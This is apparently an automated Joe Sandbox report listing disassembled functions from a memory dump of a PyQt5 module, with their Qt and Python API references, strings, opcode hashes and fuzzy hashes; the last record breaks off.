API ID: Region@@$Rect@@@SubtypeType_V0@@
String ID: 1J9
API String ID: 829625179-2407233842
Opcode ID: a12cfc9cf077db2527b11b7d76fb504fe3b358eba302f9eff1657a3db5e1eb22
Instruction ID: ca242467a7d3f2af769e4dfd8e26da95fe823d00505a96904c85f7715f6d17ac
Opcode Fuzzy Hash: a12cfc9cf077db2527b11b7d76fb504fe3b358eba302f9eff1657a3db5e1eb22
Instruction Fuzzy Hash: 3A41EB26B0CA5681EA509B5AF8642B9A370FB89FE4F584432DF4D03B68DF3CE845C704

Function 00007FFD862AECA0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 94COMMON

Download Yara Rule

APIs

PyType_IsSubtype.PYTHON3 ref: 00007FFD862AECC7
??XQVector4D@@QEAAAEAV0@M@Z.QT5GUI ref: 00007FFD862AED4D
??XQQuaternion@@QEAAAEAV0@AEBV0@@Z.QT5GUI ref: 00007FFD862AEDA2

Strings

1J9, xrefs: 00007FFD862AED7A

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Quaternion@@SubtypeType_V0@@Vector4
String ID: 1J9
API String ID: 2350793746-2407233842
Opcode ID: 4e8a2747c9fe504d5023b3bbe7c957e4edb1718556aa41e7418e69008d8c2b90
Instruction ID: a07edee367839f5c7e178750a9895218273e396f220156848153e7fda5a26dda
Opcode Fuzzy Hash: 4e8a2747c9fe504d5023b3bbe7c957e4edb1718556aa41e7418e69008d8c2b90
Instruction Fuzzy Hash: C241F06670CA4681EB509B5AF8552ADA370FB89BE4F484472EE4D03B68DF7CE856C700

Function 00007FFD8623AE80 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 90COMMON

Download Yara Rule

APIs

?setHeaderData@QStandardItemModel@@UEAA_NHW4Orientation@Qt@@AEBVQVariant@@H@Z.QT5GUI ref: 00007FFD8623AF98
PyBool_FromLong.PYTHON3 ref: 00007FFD8623AFCC

Strings

setHeaderData(self, section: int, orientation: Qt.Orientation, value: Any, role: int = Qt.EditRole) -> bool, xrefs: 00007FFD8623AFE3
setHeaderData, xrefs: 00007FFD8623AFEE
QStandardItemModel, xrefs: 00007FFD8623AFF5
BiEJ1|i, xrefs: 00007FFD8623AF48

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?setBool_Data@FromHeaderItemLongModel@@Orientation@Qt@@StandardVariant@@
String ID: BiEJ1|i$QStandardItemModel$setHeaderData$setHeaderData(self, section: int, orientation: Qt.Orientation, value: Any, role: int = Qt.EditRole) -> bool
API String ID: 889574541-3419900585
Opcode ID: 9cf125096bec5edf6118a1d11137f86ea22047e541ae7e2872e42483af59dd8c
Instruction ID: cbcddb45c5fa225355bcd30e1d6651638801569d5c923ee991f12d38bd6570c2
Opcode Fuzzy Hash: 9cf125096bec5edf6118a1d11137f86ea22047e541ae7e2872e42483af59dd8c
Instruction Fuzzy Hash: A7410976709B41CAE7508F25E8943AD73A8FB48B98F540176EA8D07B28EF3CD958C710

Function 00007FFD86298FD0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 80COMMON

Download Yara Rule

APIs

?arcMoveTo@QPainterPath@@QEAAXAEBVQRectF@@N@Z.QT5GUI ref: 00007FFD86299052

Strings

Bddddd, xrefs: 00007FFD86299093
QPainterPath, xrefs: 00007FFD86299132
arcMoveTo, xrefs: 00007FFD8629912B
BJ9d, xrefs: 00007FFD86299008
arcMoveTo(self, rect: QRectF, angle: float)arcMoveTo(self, x: float, y: float, w: float, h: float, angle: float), xrefs: 00007FFD86299120

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?arcMovePainterPath@@Rect
String ID: BJ9d$Bddddd$QPainterPath$arcMoveTo$arcMoveTo(self, rect: QRectF, angle: float)arcMoveTo(self, x: float, y: float, w: float, h: float, angle: float)
API String ID: 48915660-4082670709
Opcode ID: 6c1c445f7a65a3132875719f163ca5d45824bd89057824477abd16ec653439c7
Instruction ID: 03051374dd36f8eb24c2fb2e118e8d512a78fc6a5f6d3fb59bfb02faa85ab7f9
Opcode Fuzzy Hash: 6c1c445f7a65a3132875719f163ca5d45824bd89057824477abd16ec653439c7
Instruction Fuzzy Hash: 0F410936609F86D9DB50CF24E4902EA73B8FB48798F545236EA4D0BB28EF38D555C700

Function 00007FFD8623EC90 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 69COMMON

Download Yara Rule

APIs

?setItemData@QStandardItemModel@@UEAA_NAEBVQModelIndex@@AEBV?$QMap@HVQVariant@@@@@Z.QT5GUI ref: 00007FFD8623ED70
PyBool_FromLong.PYTHON3 ref: 00007FFD8623EDAB

Strings

BJ9J1, xrefs: 00007FFD8623ECFD
setItemData(self, index: QModelIndex, roles: Dict[int, Any]) -> bool, xrefs: 00007FFD8623EDC1
setItemData, xrefs: 00007FFD8623EDCD
QStandardItemModel, xrefs: 00007FFD8623EDD4

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Item$?setBool_Data@FromIndex@@LongMap@ModelModel@@StandardVariant@@@@@
String ID: BJ9J1$QStandardItemModel$setItemData$setItemData(self, index: QModelIndex, roles: Dict[int, Any]) -> bool
API String ID: 2122984654-1688523469
Opcode ID: fc4a5fd18f8598185fc3e0a3a75b6d52f3a90fb8ad1d9f70c24f4be132d4d0ea
Instruction ID: fd4883f3e1257fb4d59994ac50c4451b2bfd8d736448ad818bf75f956f516ca5
Opcode Fuzzy Hash: fc4a5fd18f8598185fc3e0a3a75b6d52f3a90fb8ad1d9f70c24f4be132d4d0ea
Instruction Fuzzy Hash: B531073270CB8695EA608F15F4A43AA77A4FB85BA0F044172DACD07764EF3CD489CB00

Function 00007FFD86298A80 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 66COMMON

Download Yara Rule

APIs

??0QTransform@@QEAA@XZ.QT5GUI ref: 00007FFD86298AE0
?toFillPolygon@QPainterPath@@QEBA?AVQPolygonF@@AEBVQTransform@@@Z.QT5GUI ref: 00007FFD86298AF4

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

Strings

BJ9, xrefs: 00007FFD86298B3C
QPainterPath, xrefs: 00007FFD86298BB3
toFillPolygon(self) -> QPolygonFtoFillPolygon(self, matrix: QTransform) -> QPolygonF, xrefs: 00007FFD86298B9D
toFillPolygon, xrefs: 00007FFD86298BAC

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: FillPainterPath@@PolygonPolygon@Transform@@Transform@@@malloc
String ID: BJ9$QPainterPath$toFillPolygon$toFillPolygon(self) -> QPolygonFtoFillPolygon(self, matrix: QTransform) -> QPolygonF
API String ID: 3064008061-3836140896
Opcode ID: 6a5dd685f43eb86915909730c8231b654fcd6d27975e6db7832f5dce04a7155a
Instruction ID: dd0f8c5a81bf7b7f874be9f69fbc9422f07a5bb1354862f31b6cdb491549d361
Opcode Fuzzy Hash: 6a5dd685f43eb86915909730c8231b654fcd6d27975e6db7832f5dce04a7155a
Instruction Fuzzy Hash: 6C316E76B09B8681EB50DF15E8A87EA73A4FB89BA0F544136CA8D47764DF3CD948C700

Function 00007FFD86266FB0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 62COMMON

Download Yara Rule

APIs

?translate@QRegion@@QEAAXHH@Z.QT5GUI ref: 00007FFD86267018

Strings

BJ9, xrefs: 00007FFD8626704E
QRegion, xrefs: 00007FFD862670B2
translate, xrefs: 00007FFD862670AB
Bii, xrefs: 00007FFD86266FDB
translate(self, dx: int, dy: int)translate(self, p: QPoint), xrefs: 00007FFD8626709F

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?translate@Region@@
String ID: BJ9$Bii$QRegion$translate$translate(self, dx: int, dy: int)translate(self, p: QPoint)
API String ID: 412992534-1275137643
Opcode ID: 4ff6ed8c92d96eba000eb863960173e4f7c5f0f65cc579ec26d6faecf9a1adc2
Instruction ID: 17e351e0bc1d24eb6c76c6bf473caf4f808d8dc879c38efa6eccdf08e4aa8607
Opcode Fuzzy Hash: 4ff6ed8c92d96eba000eb863960173e4f7c5f0f65cc579ec26d6faecf9a1adc2
Instruction Fuzzy Hash: 8331E476718B46C2EB008F15E8986AE73A4FB88BA0F544136DB5D03724EF39D955CB40

Function 00007FFD8622CE10 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 62COMMON

Download Yara Rule

APIs

?translate@QPolygon@@QEAAXHH@Z.QT5GUI ref: 00007FFD8622CE78

Strings

QPolygon, xrefs: 00007FFD8622CF12
BJ9, xrefs: 00007FFD8622CEAE
translate, xrefs: 00007FFD8622CF0B
translate(self, dx: int, dy: int)translate(self, offset: QPoint), xrefs: 00007FFD8622CEFF
Bii, xrefs: 00007FFD8622CE3B

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?translate@Polygon@@
String ID: BJ9$Bii$QPolygon$translate$translate(self, dx: int, dy: int)translate(self, offset: QPoint)
API String ID: 1424663529-480926495
Opcode ID: f32a5a7579913c4acf17da543a4e1edb791343ea5dfe0a273ee231cec3696c87
Instruction ID: 0a6215fd54bd4a079c96cd19193ae7abc9b2d9dc2a18ad069ff13df5796ee67a
Opcode Fuzzy Hash: f32a5a7579913c4acf17da543a4e1edb791343ea5dfe0a273ee231cec3696c87
Instruction Fuzzy Hash: 3831F776718B46C2EB008F15E8986AE73B4FB88BA0F544132DA5D03724EF3DE955CB40

Function 00007FFD86224CC0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 55COMMON

Download Yara Rule

APIs

?lastIndexOf@?$QVector@VQPointF@@@@QEBAHAEBVQPointF@@H@Z.QT5CORE ref: 00007FFD86224D66
PyLong_FromLong.PYTHON3 ref: 00007FFD86224D8F

Strings

QPolygonF, xrefs: 00007FFD86224DC2
BJ1|i, xrefs: 00007FFD86224D25
lastIndexOf, xrefs: 00007FFD86224DBB
lastIndexOf(self, value: Union[QPointF, QPoint], from_: int = -1) -> int, xrefs: 00007FFD86224DAC

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Point$?lastF@@@@FromIndexLongLong_Of@?$Vector@
String ID: BJ1|i$QPolygonF$lastIndexOf$lastIndexOf(self, value: Union[QPointF, QPoint], from_: int = -1) -> int
API String ID: 354807286-2951539435
Opcode ID: 3aab638d97a7cc5c5554af7ca9975588dbe3a9b533278aaf9c531c0c7cb6c295
Instruction ID: 75c3715230e1e983d202c97903ef5f5c202aea6b3ca5cb42ab87f8d530114219
Opcode Fuzzy Hash: 3aab638d97a7cc5c5554af7ca9975588dbe3a9b533278aaf9c531c0c7cb6c295
Instruction Fuzzy Hash: 6A31F876B0CB52C6EB508F25E8983AD33A8FB487A0F954136CA9D43720EF39D959C700

Function 00007FFD8623EDF0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 55COMMON

Download Yara Rule

APIs

?redo@QTextDocument@@QEAAXXZ.QT5GUI ref: 00007FFD8623EE3F
?redo@QTextDocument@@QEAAXPEAVQTextCursor@@@Z.QT5GUI ref: 00007FFD8623EEB7

Strings

BJ8, xrefs: 00007FFD8623EE75
redo, xrefs: 00007FFD8623EED2
QTextDocument, xrefs: 00007FFD8623EED9
redo(self)redo(self, cursor: Optional[QTextCursor]), xrefs: 00007FFD8623EEC6

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Text$?redo@Document@@$Cursor@@@
String ID: BJ8$QTextDocument$redo$redo(self)redo(self, cursor: Optional[QTextCursor])
API String ID: 1773181922-1477152151
Opcode ID: 56a6bdd1ad3201535844c73f25a96c05d2326ef91820abe45a685d308ee7f7c8
Instruction ID: 125a6a4cafa3e1d77a45802072fbaeb0485d4ee4f470f97a59e4582243c27e52
